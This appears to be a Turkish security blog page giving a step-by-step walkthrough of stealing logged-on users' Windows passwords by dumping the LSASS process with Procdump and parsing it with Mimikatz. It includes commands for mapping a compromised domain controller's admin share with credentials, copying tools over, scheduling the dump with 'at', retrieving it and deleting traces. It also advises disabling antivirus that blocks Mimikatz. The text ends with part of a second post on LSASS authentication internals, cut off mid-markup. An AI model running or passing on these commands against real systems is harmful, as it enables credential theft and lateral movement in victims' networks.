Procdump ve Mimikatz ile LSASS İçerisinden Oturum Açan Kullanıcıların Parolalarını Elde Etme

<div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6LLGqK4xWLlsXuK9UqPlbQcASJFWREVi9a7SEQvQY9EOVR9HiYLOE1LkG3MX0qLrzL4uuduMwCTvH0B9OZBBG1cCy6a-2kq7mQgxrs_P1Fgu0aTjJR3b6B9Nz3Z3mHolAm-P2HhAMFb0/s1600/01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6LLGqK4xWLlsXuK9UqPlbQcASJFWREVi9a7SEQvQY9EOVR9HiYLOE1LkG3MX0qLrzL4uuduMwCTvH0B9OZBBG1cCy6a-2kq7mQgxrs_P1Fgu0aTjJR3b6B9Nz3Z3mHolAm-P2HhAMFb0/s320/01.jpg" width="320" /></a></div>Mimikatz bir prosesin (içerisinde kimlik bilgileri barındıran LSASS.exe) içinden logon olmuş kullanıcıların parolalarını çekebilmektedir. Böylece oturum açılabilen ama AV gibi engelleyici sistemler yüzünden mimikatz/wce çalıştırılamayan makinelerde proses içerisinden bu kimlik bilgileri elde edilebilir. Bu aracın çalışma mekanizması ile ilgili ayrıntılı bilgi için bakınız:<br /><a href="http://www.agguvenligi.net/2013/09/wce-ve-mimikatz-ile-windows-parolasi-elde-edilmesi.html">http://www.agguvenligi.net/2013/09/wce-ve-mimikatz-ile-windows-parolasi-elde-edilmesi.html</a><br /><br /><br /><br />Proses içerisinden parolaları elde edebilmek için öncelikle ele geçirilen kritik makineden LSASS prosesinin dump dosyası alınır:</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNEwUgKLyRWuyHIUTIaeoR7LObUrrURU0XHylIeAhczI0Mgr4uk7MZxCMgMh2bn5uv5VO1vT_9ZUbpA_J137Q1qHKkREdR1umwdYxGYtNqHVPYTrV9M8qCdNN_TTLJLEJl5d8nUueI5lY/s1600/00.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNEwUgKLyRWuyHIUTIaeoR7LObUrrURU0XHylIeAhczI0Mgr4uk7MZxCMgMh2bn5uv5VO1vT_9ZUbpA_J137Q1qHKkREdR1umwdYxGYtNqHVPYTrV9M8qCdNN_TTLJLEJl5d8nUueI5lY/s320/00.png" width="308" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Proses dump dosyasının alınması</td></tr></tbody></table><br /><div style="text-align: justify;"><b>Not: </b>Ekran görüntüsünde de görüldüğü gibi, Şirket etki alanında bulunan bir sunucuda 3 kullanıcının (StandartKullanici1, YoneticiKullanici1, Administrator) bilgisayarda oturum açtığı görülmektedir.</div><br />Bu dosya bir yere kaydolur:<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS_kaKt2-rKkWpdrMw0pT9yliczxAxh1EXt89ldF1Q8RIMPmBpkaA_gemiE-Jf4oyKFzA1Ju23f9A60eTpeB5aPKFrRkgxAp4H1Yn4vnF_iiVSY38ct7xF9kNabscv3TugAf3drJhZf2I/s1600/01.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS_kaKt2-rKkWpdrMw0pT9yliczxAxh1EXt89ldF1Q8RIMPmBpkaA_gemiE-Jf4oyKFzA1Ju23f9A60eTpeB5aPKFrRkgxAp4H1Yn4vnF_iiVSY38ct7xF9kNabscv3TugAf3drJhZf2I/s320/01.png" width="309" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Dump dosyasının kaydedilmesi</td></tr></tbody></table><br /><div style="text-align: justify;">Bu dump dosyası, RDP ile yerel disk paylaşımı yolu veya başka bir yol ile aynı mimariye sahip bir makineye alınır. Bu örnekte Windows Server 2008 R2 makineler kullanılmıştır. Bu makine üzerinde Mimikatz çalıştırılacağı için, makinenin sanal makine olması tercih edilir. Ayrıca mimikatz’ın çalışmasını engelleyen tüm sistemler devre dışı bırakılır.</div><div style="text-align: justify;"><br /></div>Sanal makinede aşağıdaki uygulamalar hazır bulunmalıdır:<br /><ul><li><b>Procdump:</b> <a href="http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx">http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx</a></li><li><b>Mimikatz:</b> <a href="http://blog.gentilkiwi.com/mimikat">http://blog.gentilkiwi.com/mimikat</a>z --> <b>“mimikatz_trunk\alpha\x64”</b> dizinindeki <b>mimikatz.exe</b> kullanılacaktır.</li></ul><br />Bu iki uygulama ve alınan dump sanal makinede bir klasöre konulur.<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTxtf-qxjX-HKNxVU97vH-my8pvzwe7sOtFMu2QHN0oRVUmHTVp1SlK-2pZymG2A0PlUDQikxuUHWu_5fp6WG-dT7xaDFwYXYlitZ751r6_P_QlWBV5b_8L-KAJEMuoa0rgjyqS3PoS9w/s1600/02.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTxtf-qxjX-HKNxVU97vH-my8pvzwe7sOtFMu2QHN0oRVUmHTVp1SlK-2pZymG2A0PlUDQikxuUHWu_5fp6WG-dT7xaDFwYXYlitZ751r6_P_QlWBV5b_8L-KAJEMuoa0rgjyqS3PoS9w/s320/02.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Dump dosyası ve kullanılacak diğer araçların listelenmesi</td></tr></tbody></table><br /><div style="text-align: justify;">Örnek olması açısından mimikatz uygulaması, bilgisayar adı "SRV" olan sanal sunucuda çalıştırılacaktır. Görüldüğü gibi, sadece oturumu açık olan Administrator kullanıcısının parolası (Test123) elde edilebilmektedir. Çalıştırılan komutlar aşağıdaki gibidir:</div><blockquote class="tr_bq"><i>mimikatz</i><br /><i>privilege::debug</i><br /><i>sekurlsa::logonPasswords full</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5PGt6NOqau3I7hzks6_Y98S1nhT4APoTyASrwdcrXLkmKyoBGeHVElLhlGX9xOShKWrRIJs3Jdtn28ppOAuz0yUW46CTYVnsNThbP-e58AT7W5Cd7h4VPD11J0trr4Fw-EyWDQbEjFOs/s1600/03.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5PGt6NOqau3I7hzks6_Y98S1nhT4APoTyASrwdcrXLkmKyoBGeHVElLhlGX9xOShKWrRIJs3Jdtn28ppOAuz0yUW46CTYVnsNThbP-e58AT7W5Cd7h4VPD11J0trr4Fw-EyWDQbEjFOs/s1600/03.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Mimikatz aracının standart kullanımı</td></tr></tbody></table><br /><div style="text-align: justify;">Dump bilgisi alınan bilgisayarda oturum açmış olan kullanıcıların parola bilgilerini almak için sanal makinedeki LSASS prosesine, dump bilgisi alnan LSASS prosesi yazılacaktır. Daha sonra da yukarıdaki örneğe benzer olarak LSASS prosesine DLL enjeksiyonu gerçekleştirilerek proseste kayıtlı olan parola bilgileri alınacaktır. Bu amaçla, komut satırından hazırlanan klasöre gelinerek aşağıdaki komutlar çalıştırılır.</div><blockquote class="tr_bq"><i>procdump -accepteula -ma lsass.exe lsass.dmp</i><br /><i>mimikatz.exe</i><br /><i>sekurlsa::minidump lsass.dmp</i><br /><i>sekurlsa::logonPasswords</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZirVGDrzI9LzBkkJyRf-x_ox0RBhnTFf5cDWEYFL7BwR4mEBn1AamL1wwcjJh8TUc1NWXHBJKuJo-qm9LraO2w3KhypeJK-dnQx-NiqjwSI7XHkdO8VoYFlSArqYzm7we1uocEF-DVH0/s1600/04.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZirVGDrzI9LzBkkJyRf-x_ox0RBhnTFf5cDWEYFL7BwR4mEBn1AamL1wwcjJh8TUc1NWXHBJKuJo-qm9LraO2w3KhypeJK-dnQx-NiqjwSI7XHkdO8VoYFlSArqYzm7we1uocEF-DVH0/s320/04.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Dış sistemden alınan LSASS prosesinin içerisindeki bilgilerin iç sistemde elde edilmesi </td></tr></tbody></table><br />Böylece, oturum açmış olan kullanıcıların parola özetleri ve parolalarının açık hali elde edilir.<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCjAhOjsRsl_Wh0Nl5M6R1D_KstKdB_7NVYX0fcVQfNvnFnf3DePBw6zQpiQAn1VUrO8f4ia75lY3ohXcyPkc8Xbn0qSS4A3-AVk-g0bULZwlutGvh4fL6XOJrZZuNmDesBRelhKmkGps/s1600/05.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCjAhOjsRsl_Wh0Nl5M6R1D_KstKdB_7NVYX0fcVQfNvnFnf3DePBw6zQpiQAn1VUrO8f4ia75lY3ohXcyPkc8Xbn0qSS4A3-AVk-g0bULZwlutGvh4fL6XOJrZZuNmDesBRelhKmkGps/s320/05.png" width="260" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Parola bilgilerinin listelenmesi</td></tr></tbody></table><br /><b>Not:</b> LSASS prosesi haricinde bir proses kullanıldığında aşağıdaki gibi hata mesajları alınabilmektedir.<br /><blockquote class="tr_bq"><i>ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations</i><br /><i>ERROR kuhl_m_sekurlsa_acquireLSA ; Handle of memory</i></blockquote><br /><div style="text-align: justify;"><b>Not: </b>Dump alma işlemi, Exchange Server 2010 CAS/MBS rolüne sahip bir sunucuda gerçekleştirilirse, mail yollamak için bu sunucudan DC'ye  giden tüm kullanıcıların parolaları elde edilebilir. Bu sebeple, DC'ye erişimlerin yanında Exchange sunucuya erişimler de önem arz etmektedir.</div><br /><h4>LSASS Dump Dosyasının Uzak Makineden Alınması</h4><div style="text-align: justify;">Yukarıdaki adımlarda uzak makineye RDP gerçekleştirilerek dump dosyası alınmıştı. RDP, FW tarafından engellenmişse, yönetimsel paylaşımlar ve zamanlanmış görevler kullanılarak da bu işlemler gerçekleştirilebilir. Bu amaçla bir zamanlanmış görevin çalıştırılacağı bir betik (Procdump_Betik.bat) hazırlanır. Betik içeriği şu şekildedir:</div><blockquote class="tr_bq"><i>@echo off</i><br /><i>C:\Yeni_Klasor\procdump.exe -accepteula -ma lsass.exe C:\Yeni_Klasor\Hedef_LSASS.dmp</i></blockquote>Bu betik çalıştığı makinede LSASS prosesinin dump'ını C:\Yeni_Klasor içerisine bir dosyaya atmaktadır.<br /><br /><div style="text-align: justify;">Saldırganın makinesinin (SRV adlı / 192.168.100.102 IP adresli makine)  masaüstünde Test adlı bir klasörde bu betik, Procdump ve Mimikatz uygulamaları bulunmaktadır:</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw9zA-bSxHV8sgNYV-hmQWPsuApqhgjpn-usr9e6HNxwYpb_kstEm5GXHTJRENimNW2B48LTyy11eUPGFmmVjXgS0a1BJx3SEHdzMCgkPj62v-yQZY66TTKBLAOwWeIicM0-1u2sndzto/s1600/06.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw9zA-bSxHV8sgNYV-hmQWPsuApqhgjpn-usr9e6HNxwYpb_kstEm5GXHTJRENimNW2B48LTyy11eUPGFmmVjXgS0a1BJx3SEHdzMCgkPj62v-yQZY66TTKBLAOwWeIicM0-1u2sndzto/s1600/06.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Uzak makinedeki LSASS prosesinin alınması için gerekli araçların listelenmesi</td></tr></tbody></table><span style="text-align: justify;"><br /></span><span style="text-align: justify;">Saldırgan ele geçirdiği hedef makinenin (DC adlı / 192.168.100.101 IP adresli makine) C diskine Yeni_Klasör adlı bir dizin oluşturur. Bu amaçla kullanılan komutlar şu şekildedir:</span><br /><blockquote class="tr_bq"><i>net use \\192.168.100.101\C$ /user:Sirket\Saldirgan Deneme123?</i><br /><i>dir \\192.168.100.101\C$</i><br /><i>mkdir \\192.168.100.101\C$\Yeni_Klasor</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzy8r8Arhp4ZshIvpE9ACJ-4GPaC4h1zg-OXpWZ6JrXTsbfwelaFMugi7QqS-rCsLOPx-Foksamuls5taJwQmsu4rQzUYKt7VL0zwMCaxvM1IjVGdRTjlyUVIWc3bXGc-KHiuuiVVrL1E/s1600/07.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzy8r8Arhp4ZshIvpE9ACJ-4GPaC4h1zg-OXpWZ6JrXTsbfwelaFMugi7QqS-rCsLOPx-Foksamuls5taJwQmsu4rQzUYKt7VL0zwMCaxvM1IjVGdRTjlyUVIWc3bXGc-KHiuuiVVrL1E/s320/07.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Uzak makinenin diski ile map işleminin başlatılması</td></tr></tbody></table>Daha sonra Procdump uygulaması ve betik hedef makineye kopyalanır.<br /><blockquote class="tr_bq"><i>copy C:\Users\Administrator\Desktop\Test\procdump.exe \\192.168.100.101\C$\Yeni_Klasor</i><br /><i>copy C:\Users\Administrator\Desktop\Test\Procdump_Betik.bat \\192.168.100.101\C$\Yeni_Klasor</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGw4WRFjDXJ3Yu9YBv9tq54wpn27VSCAkkev0QgZrUrqThGfCahnayRafVz09cMwA-aAqe4wc6YUTWkhZvg7NxF_0L8qvSsXQvlIDJBG7X15QTIjojesxyA7HB9Qcjsugr8AA5QUn73HQ/s1600/08.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGw4WRFjDXJ3Yu9YBv9tq54wpn27VSCAkkev0QgZrUrqThGfCahnayRafVz09cMwA-aAqe4wc6YUTWkhZvg7NxF_0L8qvSsXQvlIDJBG7X15QTIjojesxyA7HB9Qcjsugr8AA5QUn73HQ/s320/08.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Uzak makineye Procdump aracının ve betiğin gönderilmesi</td></tr></tbody></table><br /><div style="text-align: justify;"><b>Not:</b> Yukarıda gerçekleştirilen betiği ve uygulamayı karşı makineye gönderme işlemleri Run penceresi kullanılarak da görsel bir şekilde gerçekleştirilebilirdi.</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7vS868XAoI8sYQbCK6v6n6IXhzPuI3Y4kugwLdsnrtg12vTBoD52er7HqIddDRfdYDDbqMYSd0VOotuO3JxGl99l_ernBQ8BvhSSQxmXTNj3aVhSdOgHzru0BDL_Ak49-eEVQBoXQivQ/s1600/09.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7vS868XAoI8sYQbCK6v6n6IXhzPuI3Y4kugwLdsnrtg12vTBoD52er7HqIddDRfdYDDbqMYSd0VOotuO3JxGl99l_ernBQ8BvhSSQxmXTNj3aVhSdOgHzru0BDL_Ak49-eEVQBoXQivQ/s320/09.jpg" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Uzak makinenin diskine erişim için alternatif yol (Paylaşıma girilmesi)</td></tr></tbody></table><br />Hedef sistemin saatine bakılır ve bir dakika sonrasında çalışacak şekilde bir zamanlanmış görev oluşturulur.<br /><blockquote class="tr_bq"><i>net time \\192.168.100.101</i><br /><i>at \\192.168.100.101 10:32 C:\Yeni_Klasor\Procdump_Betik.bat</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqwS7TZg0NmWTlHtTcwsGGYJHAI8OiJ3TE8QbpPl7vwqYHj3vycktYMHlh86b_D2bbeIqTNzNQrk-_mMHCeIoxarG-IuMzlbLQJ1Uk2H-XbFMVuMkkk5iC1GaqZHzURv2658sySQmk6OY/s1600/03.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqwS7TZg0NmWTlHtTcwsGGYJHAI8OiJ3TE8QbpPl7vwqYHj3vycktYMHlh86b_D2bbeIqTNzNQrk-_mMHCeIoxarG-IuMzlbLQJ1Uk2H-XbFMVuMkkk5iC1GaqZHzURv2658sySQmk6OY/s400/03.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Betiği çalıştırmak için zamanlanmış görevin oluşturulması</td></tr></tbody></table><b><br />Not: </b>Bu işlem yerine hedef makinede çalışacak şekilde PSExec aracı da kullanılabilirdi.<br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Zamanlanmış görev çalışması teyit edilir ve oluşan dump dosyası saldırgan makinesine kopyalanır. Kopyalama işlemi tamamlandıktan sonra, oluşturulan klasör silinir.</div><blockquote class="tr_bq"><i>dir \\192.168.100.101\C$\Yeni_Klasor</i><br /><i>copy \\192.168.100.101\C$\Yeni_Klasor\Hedef_LSASS.dmp Desktop\Test</i><br /><i>dir Desktop\Test</i><br /><i>rmdir /s \\192.168.100.101\C$\Yeni_Klasor</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlfuF79vXsghPggfVUOCVQB3Pttyy_JvIE88A3NfTtR5N5Jwgm_jllajOjTcuFWo2STqJAMjWhO1l9OImVKfdwV3ZGBggPBomaQ_cDZXPuMpaRN7eeFjUEjhHx_M8g8AohfjvEnUjJ2xg/s1600/11.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlfuF79vXsghPggfVUOCVQB3Pttyy_JvIE88A3NfTtR5N5Jwgm_jllajOjTcuFWo2STqJAMjWhO1l9OImVKfdwV3ZGBggPBomaQ_cDZXPuMpaRN7eeFjUEjhHx_M8g8AohfjvEnUjJ2xg/s320/11.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Oluşan dump dosyasının hedef sistemden alınması</td></tr></tbody></table><br />Son durumda saldırganın Test klasöründeki dosyalar şu şekilde olur.<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAgKMFtvqhm7Rhslb1G5h3_H0cTQ7PaD-AiguLgVs_2Pd3FNWiBMRviGOUeJzW0Jreu-hXSSYTIachKcqn3CwzO3jgah1jrgjmAew7hYMd6mhRYhjGnzzCooqoXt7L3Iz3-35xc7Y4-bU/s1600/12.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAgKMFtvqhm7Rhslb1G5h3_H0cTQ7PaD-AiguLgVs_2Pd3FNWiBMRviGOUeJzW0Jreu-hXSSYTIachKcqn3CwzO3jgah1jrgjmAew7hYMd6mhRYhjGnzzCooqoXt7L3Iz3-35xc7Y4-bU/s320/12.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Elde edilen proses dump dosyasının ve diğer araçların listelenmesi</td></tr></tbody></table><br /><div style="text-align: justify;">Daha önceden bahsedilen adımlar uygulanarak dump dosyasından kullanıcı ve parola bilgileri elde edilir. Kullanılan komutlar şu şekildedir:</div><blockquote class="tr_bq"><i>mimikatz.exe</i><br /><i>sekurlsa::minidump Hedef_LSASS.dmp</i><br /><i>sekurlsa::logonPasswords</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7eD5UHBbKNYsqfXyHDk6CKh83Fy03KXyligs3FN8jiad0n2d0SnTrAs3Ajq0ap3ijEkDzB9cQezzbhcImGboFqhwHKRFEYrJTN_DGghbkwvowciiuBIVE46hPKErivnN_1P_bhbDThkE/s1600/13.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7eD5UHBbKNYsqfXyHDk6CKh83Fy03KXyligs3FN8jiad0n2d0SnTrAs3Ajq0ap3ijEkDzB9cQezzbhcImGboFqhwHKRFEYrJTN_DGghbkwvowciiuBIVE46hPKErivnN_1P_bhbDThkE/s320/13.png" width="294" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Hedef sistemden alınan proses dump dosyasından parolaların çekilmesi</td></tr></tbody></table><br />

Procdump ve Mimikatz ile LSASS İçerisinden Oturum Açan Kullanıcıların Parolalarını Elde Etme

Mimikatz bir prosesin (içerisinde kimlik bilgileri barındıran LSASS.exe) içinden logon olmuş kullanıcıların parolalarını çekebilmektedir. Bö...

Read more »

WCE ve Mimikatz Kullanarak Windows Oturum Parolalarının Açık Halde Elde Edilmesi #2

<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEWXaSNGGssb3cwR5A7Kie10pdwcCuhQ_4Pjt35Ix6cMFnyEVruFB0pl1G7YAblO71tSvbFi1JUBqnjbBOgWt3dmaYfnjueNHR0q6QX2PKmF83DjHta6XfjD__HiHhWGxAUB0YNMZLVbg/s1600/apt.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEWXaSNGGssb3cwR5A7Kie10pdwcCuhQ_4Pjt35Ix6cMFnyEVruFB0pl1G7YAblO71tSvbFi1JUBqnjbBOgWt3dmaYfnjueNHR0q6QX2PKmF83DjHta6XfjD__HiHhWGxAUB0YNMZLVbg/s320/apt.jpg" width="320" /></a></div><div style="text-align: justify;"><a href="http://www.agguvenligi.net/2013/09/wce-ve-mimikatz-ile-windows-parolasi-elde-edilmesi.html">Bir önceki yazıda</a> Windows işletim sisteminde oturum açma sırasında görevli olan prosesler ve bu proseslerin işlevlerinden konumuz dahilinde bahsedilmişti. Ayrıca oturum açma işlemi sırasında kullanıcı bilgilerinin alınacağı arayüzün kullanıcının karşısına çıkarılması, kullanıcıdan gerekli bilgilerin alınması ve bu bilgilerin LSASS prosesine iletilmesine kadar olan adımlar incelenmişti.</div><br /><div style="text-align: justify;">Bu yazıda ise asıl amaç olan parolaların açık bir şekilde elde edilmesinin nasıl mümkün olduğu konusuna değinilecektir. Bu yazı iki bölümden oluşacaktır. Öncelikle LSASS prosesinin parola bilgisini nasıl ele aldığı konusu incelenecek, daha sonra da işletim sisteminin oturum açma mimarisini kötüye kullanan iki aracın (WCE ve Mimikatz) nasıl çalıştığı konusuna değinilecektir.</div><br /><a name="more"></a><br /><b>LSASS ve Windows İşletim Sisteminde Oturum Açma İşlemi</b><br /><b><br /></b><br /><div style="text-align: justify;">Windows işletim sistemi üzerindeki kullanıcı kimlik bilgileri doğrulanma işlemleri için SSPI (Security Support Provider Interface) adı verilen özel bir mimari tasarlanmıştır. Kimlik doğrulaması ile ilgili tüm çağrılar (call) bu mimari temelinde ele alınır. Böylece hem Windows kimlik doğrulama mekanizmasını koruma altına almakta, hem de kendi kimlik doğrulama mekanizmalarını kullanmak isteyen geliştiricilerin Windows’un kullandığı kimlik doğrulama mekanizmalarının derinliklerine dalmasına gerek kalmamaktadır. Bu mimariyi tasarlayanlar, kimlik doğrulama işlemini istemci üzerinde (local) veya uzak bir sunucu ile istemci arasında (remote) güvenilir olarak gerçekleştirilmesini hedeflemişlerdir. Windows 7 ve Windows Server 2008 R2 mimarisindeki varsayılan kimlik doğrulama sağlayıcıları (Security Support Provider - SSP), sisteme yüklenen DLL’leri kullanarak kimlik doğrulama işlemlerini gerçekleştirirler.</div><br /><div style="text-align: justify;">Kimlik bilgisi sağlayıcılarından (CP) geçen kimlik bilgileri Winlogon prosesine eriştiği konusuna değinilmişti. Winlogon prosesi LSASS prosesinin LsaLookupAuthenticationPackage fonksiyonunu çağırarak, bilgisayarın desteklediği bütün kimlik doğrulama paketlerinin (authentication packages) listesini elde eder. Winlogon prosesi, bu sefer LSASS prosesinin LsaLogonUser fonksiyonunu çağırarak, kimlik bilgisi sağlayıcısı (CP) için gerekli olan pakete kimlik bilgileri gönderir. Örneğin, MSV1_0.dll paketine kullanıcı adı ve şifre bilgisini gönderir.</div><br /><div style="text-align: justify;">Yerel bir sistem çağrısı ile gerçekleştirilen oturum açma işlemi temel olarak aşağıdaki gibi gerçekleşmektedir.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWb-qG4QZVsR9ND_Ce9vVd3CVEGbquK7e8HOZH42PLrUyBiidfSbvQsZceDbwj1KkIvWQ-KDocUXWqggsWAmC0LkqmkVcmt0xC6uttB0mVdxfCbpBaVFKynHyQ79ASFitcR05jg8BUY_Y/s1600/Wce&Mimikatz_10.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWb-qG4QZVsR9ND_Ce9vVd3CVEGbquK7e8HOZH42PLrUyBiidfSbvQsZceDbwj1KkIvWQ-KDocUXWqggsWAmC0LkqmkVcmt0xC6uttB0mVdxfCbpBaVFKynHyQ79ASFitcR05jg8BUY_Y/s400/Wce&Mimikatz_10.gif" width="400" /></a></div><br /><div style="text-align: justify;">Kullanıcıdan alınan kimlik bilgileri yukarıda belirtildiği şekliyle ilgili SSP (Security Support Provider) tarafından sağlanan DLL’e aktarılır. Windows 7 ve Windows Server 2008 R2 sistemlerde varsayılan olarak bulunan güvenlik destek sağlayıcıları (SSP) ve kullandıkları DLL’ler şu şekildedir:</div><ul><li>Credential Security Support Provider - credssp.dll</li><li>Digest Security Support Provider - digest.dll</li><li>Kerberos Security Support Provider - kerberos.dll</li><li>Negotiate Security Support Provider - lsasrv.dll</li><li>Negotiate Extensions Security Support Provider - negoexts.dll</li><li>NTLM Security Support Provider - msv1_0.dll</li><li>PKU2U Security Support Provider - pku2u.dll</li><li>Schannel Security Support Provider - schannel.dll</li></ul><div style="text-align: justify;">Bunların yannda Wdigest.dll, Kdcsvc.dll, Ntdsa.dll, Ntdsapi.dll vs gibi LSA bileşenleri de kimlik doğrulama işlemlerinde görev alır.</div><br /><div style="text-align: justify;">İşletim sisteminde kimlik doğrulama paketleri mevcut olduğu halde LSA (Local Security Authority) tarafından belleğe yükleme işleminin gerçekleşmezse bu DLL’ler kullanılamaz. Bu sebeple LSA tarafından bu paketler belleğe yüklenmelidir. LSA, hangi DLL dosyalarını yükleyeceğini kayıt defterindeki “<b>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</b>” kaydından alır. Bu kayıtta bulunmayan paketler belleğe yüklenmeyecek ve bu sebeple tercih edilen modda kimlik doğrulamasu gerçekleşmeyecektir.</div><br /><div class="separator" style="clear: both; text-align: center;"><a 